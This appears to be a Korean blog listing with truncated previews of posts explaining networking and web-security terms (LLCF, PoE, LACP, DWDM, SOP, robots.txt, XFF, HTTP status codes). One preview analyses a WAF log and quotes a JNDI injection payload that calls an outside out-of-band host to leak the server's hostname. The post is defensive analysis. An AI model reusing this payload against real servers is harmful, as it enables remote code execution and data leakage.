원래 용어정리 글에 같이 정리하려다가 내용이 비교적 길어 분리하게 됨 LLCF (Link Loss Carry Forward)L2에서 사용하며, LLCF가 설정된 장비 기준 위, 아래 Link 중 어느 하나가 끊어지면 나머지 하나의 Link도 끊는다.-> 장비의 경로 설정을 변경(Failover)할 수 있도록 해주는 네트워크 기술* failover : 장비에 이상이 생겼을 때 이중화 구성이 되어있는 예비 장비로 자동 전환되는 기술 LLCF 미설정 시 방화벽 상단 스위치와 link down이 발생할 경우, 하단 스위치는 상단 상황을 모르기 때문에 끊긴 link로 통신을 시도하고 통신 장애가 발생한다. LLCF 설정 시 동일하게 상단 스위치에서 Link Down이 발생하면 하단 스위치 Link도 Dow..
POE (Power over Ethernet) ● 이더넷 케이블을 통해 데이터와 전력을 동시에 전송할 수 있는 기술● 일반적인 케이블은 데이터 전송만을 위해 사용되지만, PoE를 사용하면 별도의 전원 케이블 없이 네트워크 장치에 전력을 공급할 수 있어 설치가 간편하고 유연성이 높아진다. LACP (Link Aggregation Control Protocol)● 여러 이더넷 링크(포트)를 그룹화하여 한개의 논리적 링크로 만드는 것(2개 포트를 1개처럼 사용하기 때문에 IP 1개를 사용한다.) ● 포트집합 : 여러개의 물리적 포트를 하나의 논리적 링크로 결합해 트래픽 부하 분산 및 대역폭 확장이 가능하다.예시로 1G 포트 4개를 묶어서 4G 대역폭을 만들 수 있다. ● 로드 밸런싱 : 각 포트로 들어오는..
ECM (Enterprise Content Management)● 기업의 모든 콘텐츠를 관리하기 위한 전략적 시스템● ECM은 문서, 이미지, 동영상, 이메일, 웹 콘텐츠 등 다양한 유형의 디지털 콘텐츠를 중앙에서 효율적으로 저장, 관리, 검색, 배포, 보안, 유지보수할 수 있도록 돕는 시스템이다.● ECM 시스템은 주로 큰 기업에서 효율적으로 대량의 문서와 데이터를 관리하고, 규제 준수를 강화하며, 비즈니스 프로세스를 자동화하는 데 사용된다. DWDM (Dense Wavelength Division Multiplexing)● 광섬유 통신에서 사용되는 고속 데이터 전송 기술● DWDM은 하나의 광섬유에서 여러 개의 다른 파장(색)으로 데이터를 동시에 전송할 수 있게 함으로써, 기존 광섬유의 대역..
Option 메소드에 대해 알아보기 전에 SOP 라는 웹 정책을 먼저 알아야 한다. SOP(Same Origin Policy)란 동일 출처 정책으로, 하나의 Origin에서 불러온 문서, 스크립트가 다른 Origin과 상호작용하는것을 제한하는 정책이다.즉 같은 Origin으로만 요청을 주고 받을 수 있고, 다른 Origin으로의 Read를 제한한다. Origin 기준 : URL의 Protocol, host, port가 일치하는 경우 SOP 없이 다른 Origin 문서와 상호작용이 가능하다면, 악의적인 의도를 가진 사용자가 작성한 스크립트가 정상적인 웹 사이트에서 실행이 가능하게 되어 유저들의 정보가 악의적인 사용자에게 유출될 수 있다. 이러한 문제를 SOP을 통해 다른 Origin문서를 읽지 못하게 막..
로봇 배제 표준. 1994년 6월 만들어진 로봇 배제 프로토콜은 웹 사이트에 로봇이 접근하는 것을 방지하기 위한 규약으로, 일반적으로 접근 제한에 대한 설명을 robots.txt에 기술한다.이 규약은 권고안이며, 로봇이 robots.txt 파일을 읽고 접근을 중지하는 것을 목적으로 한다. 따라서, 접근 방지 설정을 하였다고 해도, 다른 사람들이 그 파일에 접근할 수 있다. robots.txt 파일은 항상 사이트의 루트 디렉토리에 위치해야 한다. ex) http://www.aaa.com/robots.txt robots.txt 의 파일 구조User-agent: [크롤러 이름 또는 *]Disallow: [접근 제한할 경로]User-agent: 크롤러의 이름을 명시하며, 여기에 지정된 크롤러만 해당 규칙을 적용..
특정 고객사 WAF에서 아래와 같은 GET 요청이 탐지되었는데 흔한 Directory Access나 SQL Injection 등이 아닌 조금 생소한 로그가 확인되어 찾아보았다. GET /?x=${jndi:ldap://${:-660}${:-233}.${hostName}.uri.cpbh1r5t4s1er8ongei0f3obhbiij7xxt.oast.fun/a} HTTP/1.1 이 요청은 /?x=... 부분에 잠재적으로 악의적인 페이로드가 포함되어 있다.찾아보니 JNDI 인젝션 공격을 시도하는 것으로 보이며, 이 공격은 서버 측에서 JNDI 룩업을 수행하게 하여 공격자가 제어하는 서버에 연결하려고 시도한다. 이를 통해 원격 코드 실행 등의 악의적인 행동을 수행할 수 있다. 로그 분석에 앞서 JNDI가 뭔지부..
X-Forwarded-For(XFF) 헤더는 HTTP 요청 헤더 중 하나로, 클라이언트의 IP 주소를 식별하는 데 사용된다.프록시 서버나 로드 밸런서를 사용할 때 클라이언트의 원래 IP 주소를 전달하기 위해 사용된다. 프록시 서버나 로드 밸런서를 거친 경우, 웹 서버는 클라이언트의 실제 IP 주소가 아닌 프록시 서버나 로드 밸런서의 IP 주소를 받게 된다.X-Forwarded-For 헤더는 이런 문제를 해결하기 위해 사용되며, 프록시 서버나 로드 밸런서가 이 헤더를 추가하고 클라이언트의 원래 IP 주소를 전달한다. 웹 서버는 X-Forwarded-For 헤더 값을 사용하여 클라이언트의 실제 IP 주소를 얻을 수 있다.
1XX: Informational(정보 제공)임시 응답으로 현재 클라이언트의 요청까지는 처리되었으니 계속 진행하라는 의미입니다. HTTP 1.1 버전부터 추가되었습니다.2XX: Success(성공)클라이언트의 요청이 서버에서 성공적으로 처리되었다는 의미입니다.3XX: Redirection(리다이렉션)완전한 처리를 위해서 추가 동작이 필요한 경우입니다. 주로 서버의 주소 또는 요청한 URI의 웹 문서가 이동되었으니 그 주소로 다시 시도하라는 의미입니다.4XX: Client Error(클라이언트 에러)없는 페이지를 요청하는 등 클라이언트의 요청 메시지 내용이 잘못된 경우를 의미합니다.5XX: Server Error(서버 에러)서버 사정으로 메시지 처리에 문제가 발생한 경우입니다. 서버의 부하, DB 처리 과..